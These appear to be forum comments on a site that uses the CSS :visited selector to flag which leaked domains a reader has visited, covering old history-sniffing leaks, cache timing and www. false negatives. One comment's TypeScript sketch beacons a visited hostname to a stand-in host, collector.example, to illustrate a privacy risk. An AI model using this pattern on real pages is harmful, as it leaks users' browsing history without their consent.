Right, so this site uses CSS selectors to show the user a different colour for each site they've visited.
In the past, a site could also read the computed style the browser applied to visited links and use it to find out which sites you'd visited. Luckily that privacy leak was plugged a while ago: https://blog.mozilla.org/security/2010/03/31/plugging-the-cs...
Now you'd have to do something like use timing attacks on the browser's cache... :)
Or, since you're encouraged to hover over or click on each highlighted block, JavaScript could leak that information as soon as you interact. There's no protection against the human in the loop leaking their own privacy.
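To make that concrete, here's a minimal sketch of what a page script could do once you interact. The `collector.example` host and `/log` endpoint are hypothetical, not anything this site actually does:

```typescript
// Build the URL a page script might beacon to once you interact.
// The collector.example host and /log endpoint are hypothetical.
function leakUrl(visitedHost: string): string {
  return `https://collector.example/log?host=${encodeURIComponent(visitedHost)}`;
}

// In the page, this could be wired up roughly like:
// link.addEventListener("click", () =>
//   navigator.sendBeacon(leakUrl(new URL(link.href).hostname)));
```

The point is that no style information needs to be read at all; your click alone confirms which block caught your eye.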
There are some false negatives here because some sites are linked to without the www. subdomain. I haven't visited https://okcupid.com, but I have visited https://www.okcupid.com, so it doesn't get a red dot when it should.
As a temporary fix, I prepend 'www.' to all the links. It could be improved by listing all the frequently used URLs for each site, e.g. other subdomains. Thanks!
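The "prepend www." workaround could look something like this; the bare-domain check is my own simplification, not the site's actual code:

```typescript
// Prepend "www." to a link's hostname when it looks like a bare domain.
// The "exactly one dot" heuristic is a simplification: it mishandles
// multi-part TLDs such as .co.uk.
function addWww(href: string): string {
  const url = new URL(href);
  if (url.hostname.split(".").length === 2) {
    url.hostname = "www." + url.hostname;
  }
  return url.toString();
}
```

A more robust fix would emit both the bare and the www. variant of each link (and any other known subdomains) rather than guessing which one you visited.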
One thing I didn't see discussed at all (mind you, there were thousands of comments on various threads) was crowdsourcing the search for exploited domains in people's browser caches (as opposed to search-engine and archive caches).
If I understand this, it "simply" matches against the list of domains already known to have leaked. Right? But what about other potential leaks that weren't cached by search engines but might live in people's browser caches?
One of the included sites is agilebits.com, but they're not actually vulnerable (all of the important traffic there is encrypted separately so even with TLS broken their users aren't vulnerable).
But I see you're using the :visited pseudo-class. That's actually quite genius!